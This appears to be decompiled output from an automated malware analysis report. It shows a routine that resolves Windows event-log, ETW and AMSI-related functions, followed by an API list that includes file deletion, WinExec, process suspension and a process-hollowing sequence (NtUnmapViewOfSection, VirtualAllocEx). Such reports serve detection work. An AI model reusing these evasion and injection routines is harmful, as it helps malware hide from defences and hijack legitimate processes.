                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x8f4)), _t1561, _t1720, _t1987); // executed
                                                                				E02514A98(_t1988 - 0x8f8, "WmiReceiveNotificationsA");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x8f8)));
                                                                				E02514A98(_t1988 - 0x8fc, "advapi32");
                                                                				_pop(_t1723);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x8fc)), _t1561, _t1723, _t1987);
                                                                				E02514A98(_t1988 - 0x900, "WmiQuerySingleInstanceW");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x900)));
                                                                				E02514A98(_t1988 - 0x904, "advapi32");
                                                                				_pop(_t1726);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x904)), _t1561, _t1726, _t1987);
                                                                				E02514A98(_t1988 - 0x908, "NotifyChangeEventLog");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x908)));
                                                                				E02514A98(_t1988 - 0x90c, "advapi32");
                                                                				_pop(_t1729);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x90c)), _t1561, _t1729, _t1987);
                                                                				E02514A98(_t1988 - 0x910, "WmiQueryAllDataA");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x910)));
                                                                				E02514A98(_t1988 - 0x914, "advapi32");
                                                                				_pop(_t1732);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x914)), _t1561, _t1732, _t1987);
                                                                				E02514A98(_t1988 - 0x918, "WmiOpenBlock");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x918)));
                                                                				E02514A98(_t1988 - 0x91c, "advapi32");
                                                                				_pop(_t1735);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x91c)), _t1561, _t1735, _t1987);
                                                                				E02514A98(_t1988 - 0x920, "WmiNotificationRegistrationW");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x920)));
                                                                				E02514A98(_t1988 - 0x924, "advapi32");
                                                                				_pop(_t1738);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x924)), _t1561, _t1738, _t1987);
                                                                				E02514A98(_t1988 - 0x928, "TraceQueryInformation");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x928)));
                                                                				E02514A98(_t1988 - 0x92c, "advapi32");
                                                                				_pop(_t1741);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x92c)), _t1561, _t1741, _t1987);
                                                                				E02514A98(_t1988 - 0x930, "TraceSetInformation");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x930)));
                                                                				E02514A98(_t1988 - 0x934, "advapi32");
                                                                				_pop(_t1744);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x934)), _t1561, _t1744, _t1987);
                                                                				E02514A98(_t1988 - 0x938, "TraceMessageVa");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x938)));
                                                                				E02514A98(_t1988 - 0x93c, "advapi32");
                                                                				_pop(_t1747);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x93c)), _t1561, _t1747, _t1987);
                                                                				E02514A98(_t1988 - 0x940, "TraceMessage");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x940)));
                                                                				E02514A98(_t1988 - 0x944, "advapi32");
                                                                				_pop(_t1750);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x944)), _t1561, _t1750, _t1987);
                                                                				E02514A98(_t1988 - 0x948, "TraceEvent");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x948)));
                                                                				E02514A98(_t1988 - 0x94c, "advapi32");
                                                                				_pop(_t1753);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x94c)), _t1561, _t1753, _t1987);
                                                                				E02514A98(_t1988 - 0x950, "TraceEventInstance");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x950)));
                                                                				E02514A98(_t1988 - 0x954, "advapi32");
                                                                				_pop(_t1756);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x954)), _t1561, _t1756, _t1987);
                                                                				E02514A98(_t1988 - 0x958, "SetTraceCallback");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x958)));
                                                                				E02514A98(_t1988 - 0x95c, "advapi32");
                                                                				_pop(_t1759);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x95c)), _t1561, _t1759, _t1987);
                                                                				E02514A98(_t1988 - 0x960, "SetSecurityInfo");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x960)));
                                                                				E02514A98(_t1988 - 0x964, "advapi32");
                                                                				_pop(_t1762);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x964)), _t1561, _t1762, _t1987);
                                                                				E02514A98(_t1988 - 0x968, "SetSecurityInfoExA");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x968)));
                                                                				E02514A98(_t1988 - 0x96c, "advapi32");
                                                                				_pop(_t1765);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x96c)), _t1561, _t1765, _t1987);
                                                                				E02514A98(_t1988 - 0x970, "SetSecurityInfoExW");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x970)));
                                                                				E02514A98(_t1988 - 0x974, "advapi32");
                                                                				_pop(_t1768);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x974)), _t1561, _t1768, _t1987);
                                                                				E02514A98(_t1988 - 0x978, "SetSecurityAccessMask");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x978)));
                                                                				E02514A98(_t1988 - 0x97c, "advapi32");
                                                                				_pop(_t1771);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x97c)), _t1561, _t1771, _t1987);
                                                                				E02514A98(_t1988 - 0x980, "SetPrivateObjectSecurityEx");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x980)));
                                                                				E02514A98(_t1988 - 0x984, "advapi32");
                                                                				_pop(_t1774);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x984)), _t1561, _t1774, _t1987);
                                                                				E02514A98(_t1988 - 0x988, "SetKernelObjectSecurity");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x988)));
                                                                				E02514A98(_t1988 - 0x98c, "advapi32");
                                                                				_pop(_t1777);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x98c)), _t1561, _t1777, _t1987);
                                                                				E02514A98(_t1988 - 0x990, "SetFileSecurityW");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x990)));
                                                                				E02514A98(_t1988 - 0x994, "advapi32");
                                                                				_pop(_t1780);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x994)), _t1561, _t1780, _t1987);
                                                                				E02514A98(_t1988 - 0x998, "SetFileSecurityA");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x998)));
                                                                				E02514A98(_t1988 - 0x99c, "advapi32");
                                                                				_pop(_t1783);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x99c)), _t1561, _t1783, _t1987);
                                                                				E02514A98(_t1988 - 0x9a0, "SaferSetPolicyInformation");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x9a0)));
                                                                				E02514A98(_t1988 - 0x9a4, "advapi32");
                                                                				_pop(_t1786);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x9a4)), _t1561, _t1786, _t1987);
                                                                				E02514A98(_t1988 - 0x9a8, "SaferSetLevelInformation");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x9a8)));
                                                                				E02514A98(_t1988 - 0x9ac, "advapi32");
                                                                				_pop(_t1789);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x9ac)), _t1561, _t1789, _t1987);
                                                                				E02514A98(_t1988 - 0x9b0, "ReportEventW");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x9b0)));
                                                                				E02514A98(_t1988 - 0x9b4, "advapi32");
                                                                				_pop(_t1792);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x9b4)), _t1561, _t1792, _t1987);
                                                                				E02514A98(_t1988 - 0x9b8, "ReportEventA");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x9b8)));
                                                                				E02514A98(_t1988 - 0x9bc, "advapi32");
                                                                				_pop(_t1795);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x9bc)), _t1561, _t1795, _t1987);
                                                                				E02514A98(_t1988 - 0x9c0, "ReadEventLogW");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x9c0)));
                                                                				E02514A98(_t1988 - 0x9c4, "advapi32");
                                                                				_pop(_t1798);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x9c4)), _t1561, _t1798, _t1987);
                                                                				E02514A98(_t1988 - 0x9c8, "ReadEventLogA");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x9c8)));
                                                                				E02514A98(_t1988 - 0x9cc, "advapi32");
                                                                				_pop(_t1801);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x9cc)), _t1561, _t1801, _t1987);
                                                                				E02514A98(_t1988 - 0x9d0, "OpenEventLogW");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x9d0)));
                                                                				E02514A98(_t1988 - 0x9d4, "advapi32");
                                                                				_pop(_t1804);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x9d4)), _t1561, _t1804, _t1987);
                                                                				E02514A98(_t1988 - 0x9d8, "OpenEventLogA");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x9d8)));
                                                                				E02514A98(_t1988 - 0x9dc, "advapi32");
                                                                				_pop(_t1807);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x9dc)), _t1561, _t1807, _t1987);
                                                                				E02514A98(_t1988 - 0x9e0, "SaferRecordEventLogEntry");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x9e0)));
                                                                				E02514A98(_t1988 - 0x9e4, "advapi32");
                                                                				_pop(_t1810);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x9e4)), _t1561, _t1810, _t1987);
                                                                				E02514A98(_t1988 - 0x9e8, "GetEventLogInformation");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x9e8)));
                                                                				E02514A98(_t1988 - 0x9ec, "advapi32");
                                                                				_pop(_t1813);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x9ec)), _t1561, _t1813, _t1987);
                                                                				E02514A98(_t1988 - 0x9f0, "ElfReadEventLogW");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x9f0)));
                                                                				E02514A98(_t1988 - 0x9f4, "advapi32");
                                                                				_pop(_t1816);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x9f4)), _t1561, _t1816, _t1987);
                                                                				E02514A98(_t1988 - 0x9f8, "ElfReadEventLogA");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x9f8)));
                                                                				E02514A98(_t1988 - 0x9fc, "advapi32");
                                                                				_pop(_t1819);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x9fc)), _t1561, _t1819, _t1987);
                                                                				E02514A98(_t1988 - 0xa00, "ElfOpenEventLogW");
                                                                				_push( *((intOrPtr*)(_t1988 - 0xa00)));
                                                                				E02514A98(_t1988 - 0xa04, "advapi32");
                                                                				_pop(_t1822);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0xa04)), _t1561, _t1822, _t1987);
                                                                				E02514A98(_t1988 - 0xa08, "ElfOpenEventLogA");
                                                                				_push( *((intOrPtr*)(_t1988 - 0xa08)));
                                                                				E02514A98(_t1988 - 0xa0c, "advapi32");
                                                                				_pop(_t1825);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0xa0c)), _t1561, _t1825, _t1987);
                                                                				E02514A98(_t1988 - 0xa10, "BuildSecurityDescriptorA");
                                                                				_push( *((intOrPtr*)(_t1988 - 0xa10)));
                                                                				E02514A98(_t1988 - 0xa14, "advapi32");
                                                                				_pop(_t1828);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0xa14)), _t1561, _t1828, _t1987);
                                                                				E02514A98(_t1988 - 0xa18, "BuildImpersonateTrusteeW");
                                                                				_push( *((intOrPtr*)(_t1988 - 0xa18)));
                                                                				E02514A98(_t1988 - 0xa1c, "advapi32");
                                                                				_pop(_t1831);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0xa1c)), _t1561, _t1831, _t1987);
                                                                				E02514A98(_t1988 - 0xa20, "BuildSecurityDescriptorW");
                                                                				_push( *((intOrPtr*)(_t1988 - 0xa20)));
                                                                				E02514A98(_t1988 - 0xa24, "advapi32");
                                                                				_pop(_t1834);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0xa24)), _t1561, _t1834, _t1987);
                                                                				E02514A98(_t1988 - 0xa28, "AccessCheckByType");
                                                                				_push( *((intOrPtr*)(_t1988 - 0xa28)));
                                                                				E02514A98(_t1988 - 0xa2c, "advapi32");
                                                                				_pop(_t1837);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0xa2c)), _t1561, _t1837, _t1987);
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanBuffer");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0xa30, E02514D64( *((intOrPtr*)(_t1988 - 0xa34))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0xa30)));
                                                                				_t1587 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0xa3c, _t1587, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0xa38, E02514D64( *((intOrPtr*)(_t1988 - 0xa3c))));
                                                                				_pop(_t1842); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0xa38)), _t1561, _t1842, _t1987); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("OpenSession");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0xa40, E02514D64( *((intOrPtr*)(_t1988 - 0xa44))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0xa40)));
                                                                				_t1588 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0xa4c, _t1588, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0xa48, E02514D64( *((intOrPtr*)(_t1988 - 0xa4c))));
                                                                				_pop(_t1847); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0xa48)), _t1561, _t1847, _t1987); // executed
                                                                				E02514A98(_t1988 - 0xa50, "NtCreateFile");
                                                                				_push( *((intOrPtr*)(_t1988 - 0xa50)));
                                                                				E02514A98(_t1988 - 0xa54, "ntdll");
                                                                				_pop(_t1850); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0xa54)), _t1561, _t1850, _t1987); // executed
                                                                				E02514A98(_t1988 - 0xa58, "EtwEventWriteEx");
                                                                				_push( *((intOrPtr*)(_t1988 - 0xa58)));
                                                                				E02514A98(_t1988 - 0xa5c, "ntdll");
                                                                				_pop(_t1853);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0xa5c)), _t1561, _t1853, _t1987);
                                                                				E02514A98(_t1988 - 0xa60, "NtOpenFile");
                                                                				_push( *((intOrPtr*)(_t1988 - 0xa60)));
                                                                				E02514A98(_t1988 - 0xa64, "ntdll");
                                                                				_pop(_t1856);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0xa64)), _t1561, _t1856, _t1987);
                                                                				E02514A98(_t1988 - 0xa68, "EtwEventWrite");
                                                                				_push( *((intOrPtr*)(_t1988 - 0xa68)));
                                                                				E02514A98(_t1988 - 0xa6c, "ntdll");
                                                                				_pop(_t1859);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0xa6c)), _t1561, _t1859, _t1987);
                                                                				ExitProcess(0); // executed
                                                                				_pop(_t1860);
                                                                				 *[fs:eax] = _t1860;
                                                                				_push(E0252A8E4);
                                                                				E025148C4(_t1988 - 0xa6c, 0x64);
                                                                				E025148C4(_t1988 - 0x8dc, 0x63);
                                                                				E025148A0(_t1988 - 0x744);
                                                                				E025148C4(_t1988 - 0x750, 3);
                                                                				E025148C4(_t1988 - 0x740, 0x54);
                                                                				E025148C4(_t1988 - 0x4f0, 0xd);
                                                                				E025148C4(_t1988 - 0x4bc, 0x64);
                                                                				E025148C4(_t1988 - 0x32c, 5);
                                                                				_t1868 =  *0x25251f8; // 0x25251fc
                                                                				E02515A10(_t1988 - 0x318, _t1868);
                                                                				E025148C4(_t1988 - 0x314, 0x1e);
                                                                				_t1870 =  *0x25251f8; // 0x25251fc
                                                                				E02515A10(_t1988 - 0x29c, _t1870);
                                                                				E025148C4(_t1988 - 0x298, 8);
                                                                				_t1872 =  *0x25251f8; // 0x25251fc
                                                                				E02515A10(_t1988 - 0x278, _t1872);
                                                                				E025148C4(_t1988 - 0x274, 0x11);
                                                                				E025148C4(_t1988 - 0x22c, 0x24);
                                                                				E025148A0(_t1988 - 0x198);
                                                                				E025148A0(_t1988 - 0x19c);
                                                                				return E025148C4(_t1988 - 0x194, 0x4e);
                                                                			}
                                                                0x02528ea5
                                                                0x02528ebd
                                                                0x02528ec8
                                                                0x02528ecf
                                                                0x02528eda
                                                                0x02528ef2
                                                                0x02528efd
                                                                0x02528efe
                                                                0x02528f03
                                                                0x02528f08
                                                                0x02528f0e
                                                                0x02528f1e
                                                                0x02528f36
                                                                0x02528f41
                                                                0x02528f48
                                                                0x02528f53
                                                                0x02528f6b
                                                                0x02528f76
                                                                0x02528f77
                                                                0x02528f7c
                                                                0x02528f81
                                                                0x02528f87
                                                                0x02528f97
                                                                0x02528faf
                                                                0x02528fba
                                                                0x02528fc1
                                                                0x02528fcc
                                                                0x02528fe4
                                                                0x02528fef
                                                                0x02528ff0
                                                                0x02528ff5
                                                                0x02528fff
                                                                0x02529004
                                                                0x0252900a
                                                                0x02529014
                                                                0x02529019
                                                                0x0252901f
                                                                0x02529029
                                                                0x0252902e
                                                                0x02529034
                                                                0x02529039
                                                                0x0252903f
                                                                0x0252904f
                                                                0x02529067
                                                                0x02529072
                                                                0x02529079
                                                                0x02529084
                                                                0x0252909c
                                                                0x025290a7
                                                                0x025290a8
                                                                0x025290ad
                                                                0x025290b2
                                                                0x025290b8
                                                                0x025290c8
                                                                0x025290e0
                                                                0x025290eb
                                                                0x025290f2
                                                                0x025290fd
                                                                0x02529115
                                                                0x02529120
                                                                0x02529121
                                                                0x02529126
                                                                0x0252912b
                                                                0x02529131
                                                                0x02529136
                                                                0x02529138
                                                                0x0252913d
                                                                0x0252913f
                                                                0x02529144
                                                                0x02529146
                                                                0x02529156
                                                                0x0252916e
                                                                0x02529179
                                                                0x02529180
                                                                0x0252918b
                                                                0x025291a3
                                                                0x025291ae
                                                                0x025291af
                                                                0x025291bf
                                                                0x025291ca
                                                                0x025291d6
                                                                0x025291e1
                                                                0x025291e2
                                                                0x025291e7
                                                                0x025291ec
                                                                0x025291f2
                                                                0x02529202
                                                                0x0252921a
                                                                0x02529225
                                                                0x0252922c
                                                                0x02529237
                                                                0x0252924f
                                                                0x0252925a
                                                                0x0252925b
                                                                0x0252926b
                                                                0x02529276
                                                                0x02529282
                                                                0x0252928d
                                                                0x0252928e
                                                                0x02529293
                                                                0x02529298
                                                                0x0252929e
                                                                0x025292ae
                                                                0x025292c6
                                                                0x025292d1
                                                                0x025292d8
                                                                0x025292e3
                                                                0x025292fb
                                                                0x02529306
                                                                0x02529307
                                                                0x02529317
                                                                0x02529322
                                                                0x0252932e
                                                                0x02529339
                                                                0x0252933a
                                                                0x02529349
                                                                0x02529349
                                                                0x0252902e
                                                                0x02529019
                                                                0x0252934e
                                                                0x02529353
                                                                0x02529359
                                                                0x02529369
                                                                0x02529381
                                                                0x0252938c
                                                                0x02529393
                                                                0x0252939e
                                                                0x025293b6
                                                                0x025293c1
                                                                0x025293c2
                                                                0x025293c7
                                                                0x025293d1
                                                                0x025293d6
                                                                0x025293dc
                                                                0x025293e6
                                                                0x025293eb
                                                                0x025293f1
                                                                0x025293fb
                                                                0x02529400
                                                                0x02529406
                                                                0x0252940b
                                                                0x02529411
                                                                0x02529421
                                                                0x02529439
                                                                0x02529444
                                                                0x0252944b
                                                                0x02529456
                                                                0x0252946e
                                                                0x02529479
                                                                0x0252947a
                                                                0x0252947f
                                                                0x02529484
                                                                0x0252948a
                                                                0x0252949a
                                                                0x025294b2
                                                                0x025294bd
                                                                0x025294c4
                                                                0x025294cf
                                                                0x025294e7
                                                                0x025294f2
                                                                0x025294f3
                                                                0x025294ff
                                                                0x0252950e
                                                                0x02529513
                                                                0x02529525
                                                                0x0252952a
                                                                0x0252952f
                                                                0x02529530
                                                                0x02529535
                                                                0x0252953a
                                                                0x02529540
                                                                0x02529550
                                                                0x02529568
                                                                0x02529573
                                                                0x0252957a
                                                                0x02529585
                                                                0x0252959d
                                                                0x025295a8
                                                                0x025295a9
                                                                0x025295b3
                                                                0x025295ba
                                                                0x025295bf
                                                                0x025295c4
                                                                0x025295c9
                                                                0x025295cf
                                                                0x025295df
                                                                0x025295f7
                                                                0x02529602
                                                                0x02529609
                                                                0x02529614
                                                                0x0252962c
                                                                0x02529637
                                                                0x02529638
                                                                0x02529648
                                                                0x02529653
                                                                0x0252965f
                                                                0x0252966a
                                                                0x0252966b
                                                                0x02529670
                                                                0x02529675
                                                                0x0252967b
                                                                0x0252968b
                                                                0x025296a3
                                                                0x025296ae
                                                                0x025296b5
                                                                0x025296c0
                                                                0x025296d8
                                                                0x025296e3
                                                                0x025296e4
                                                                0x025296f4
                                                                0x025296ff
                                                                0x0252970b
                                                                0x02529716
                                                                0x02529717
                                                                0x0252971c
                                                                0x02529721
                                                                0x02529727
                                                                0x02529737
                                                                0x0252974f
                                                                0x0252975a
                                                                0x02529761
                                                                0x0252976c
                                                                0x02529784
                                                                0x0252978f
                                                                0x02529790
                                                                0x025297a0
                                                                0x025297ab
                                                                0x025297b7
                                                                0x025297c2
                                                                0x025297c3
                                                                0x025297c8
                                                                0x025297cd
                                                                0x025297d3
                                                                0x025297e3
                                                                0x025297fb
                                                                0x02529806
                                                                0x0252980d
                                                                0x02529818
                                                                0x02529830
                                                                0x0252983b
                                                                0x0252983c
                                                                0x0252983c
                                                                0x02529400
                                                                0x025293eb
                                                                0x02529841
                                                                0x02529846
                                                                0x0252984c
                                                                0x0252985c
                                                                0x02529874
                                                                0x0252987f
                                                                0x02529886
                                                                0x02529891
                                                                0x025298a9
                                                                0x025298b4
                                                                0x025298b5
                                                                0x025298ba
                                                                0x025298c4
                                                                0x025298c9
                                                                0x025298cf
                                                                0x025298d9
                                                                0x025298de
                                                                0x025298e4
                                                                0x025298ee
                                                                0x025298f3
                                                                0x025298f9
                                                                0x025298fe
                                                                0x02529904
                                                                0x02529914
                                                                0x0252992c
                                                                0x02529937
                                                                0x0252993e
                                                                0x02529949
                                                                0x02529961
                                                                0x0252996c
                                                                0x0252996d
                                                                0x02529972
                                                                0x02529977
                                                                0x0252997d
                                                                0x0252998d
                                                                0x025299a5
                                                                0x025299b0
                                                                0x025299b7
                                                                0x025299c2
                                                                0x025299da
                                                                0x025299e5
                                                                0x025299e6
                                                                0x025299f3
                                                                0x025299fe
                                                                0x02529a04
                                                                0x02529a0b
                                                                0x02529a0c
                                                                0x02529a0c
                                                                0x025298f3
                                                                0x025298de
                                                                0x02529a11
                                                                0x02529a16
                                                                0x02529a1c
                                                                0x02529a21
                                                                0x02529a23
                                                                0x02529a28
                                                                0x02529a2a
                                                                0x02529a2f
                                                                0x02529a31
                                                                0x02529a41
                                                                0x02529a59
                                                                0x02529a64
                                                                0x02529a6b
                                                                0x02529a76
                                                                0x02529a8e
                                                                0x02529a99
                                                                0x02529a9a
                                                                0x02529aaa
                                                                0x02529ab5
                                                                0x02529ac1
                                                                0x02529acc
                                                                0x02529acd
                                                                0x02529ad2
                                                                0x02529ad7
                                                                0x02529add
                                                                0x02529aed
                                                                0x02529b05
                                                                0x02529b10
                                                                0x02529b17
                                                                0x02529b22
                                                                0x02529b3a
                                                                0x02529b45
                                                                0x02529b46
                                                                0x02529b56
                                                                0x02529b61
                                                                0x02529b6d
                                                                0x02529b78
                                                                0x02529b79
                                                                0x02529b7e
                                                                0x02529b83
                                                                0x02529b89
                                                                0x02529b99
                                                                0x02529bb1
                                                                0x02529bbc
                                                                0x02529bc3
                                                                0x02529bce
                                                                0x02529be6
                                                                0x02529bf1
                                                                0x02529bf2
                                                                0x02529c02
                                                                0x02529c0d
                                                                0x02529c19
                                                                0x02529c24
                                                                0x02529c25
                                                                0x02529c2a
                                                                0x02529c2f
                                                                0x02529c35
                                                                0x02529c45
                                                                0x02529c5d
                                                                0x02529c68
                                                                0x02529c6f
                                                                0x02529c7a
                                                                0x02529c92
                                                                0x02529c9d
                                                                0x02529c9e
                                                                0x02529cae
                                                                0x02529cb9
                                                                0x02529cc5
                                                                0x02529cd0
                                                                0x02529cd1
                                                                0x02529ce1
                                                                0x02529cec
                                                                0x02529cf8
                                                                0x02529d03
                                                                0x02529d04
                                                                0x02529d09
                                                                0x02529d0e
                                                                0x02529d14
                                                                0x02529d24

                                                                APIs
                                                                  • Part of subcall function 025236CC: GetModuleHandleA.KERNEL32(00000000,00000000,02523792), ref: 02523725
                                                                  • Part of subcall function 025236CC: GetProcAddress.KERNEL32(77CD0000,00000000), ref: 02523748
                                                                  • Part of subcall function 025236CC: FreeLibrary.KERNEL32(77CD0000,00000000,00000000,02523792), ref: 02523772
                                                                  • Part of subcall function 02518110: GetFileAttributesA.KERNEL32(00000000,?,02526AA4,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000,0252A8DA), ref: 0251811B
                                                                  • Part of subcall function 02525724: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252583C
                                                                  • Part of subcall function 02525724: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525853
                                                                  • Part of subcall function 02525724: CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252585C
                                                                  • Part of subcall function 02525724: CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525865
                                                                • Sleep.KERNEL32(000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 025283CF
                                                                • DeleteFileA.KERNEL32(00000000,000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02528403
                                                                • DeleteFileA.KERNEL32(00000000,00000000,000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 0252843D
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02528477
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 025284B1
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 025284EB
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02528525
                                                                • WinExec.KERNEL32 ref: 025294FF
                                                                • OpenProcess.KERNEL32(001F0FFF,000000FF,00000000,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString,0252AD5C,UacInitialize,0252AD5C,UacScan), ref: 02529520
                                                                • NtSuspendProcess.N(00000000,001F0FFF,000000FF,00000000,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString,0252AD5C,UacInitialize,0252AD5C), ref: 02529530
                                                                  • Part of subcall function 02524F34: VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 02524F87
                                                                  • Part of subcall function 02524F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02524FAD
                                                                  • Part of subcall function 02524F34: VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02524FD7
                                                                  • Part of subcall function 02524F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0252502F
                                                                  • Part of subcall function 02512FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000), ref: 02512FE8
                                                                  • Part of subcall function 025248A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 02524959
                                                                  • Part of subcall function 025248A4: GetThreadContext.KERNEL32(000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 0252497B
                                                                  • Part of subcall function 025248A4: ReadProcessMemory.KERNEL32(000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C), ref: 025249A3
                                                                  • Part of subcall function 025248A4: NtUnmapViewOfSection.N(000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000), ref: 025249C7
                                                                  • Part of subcall function 025248A4: VirtualAllocEx.KERNEL32(000005C8,00400000,0007F000,00003000,00000040,000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000), ref: 025249EF
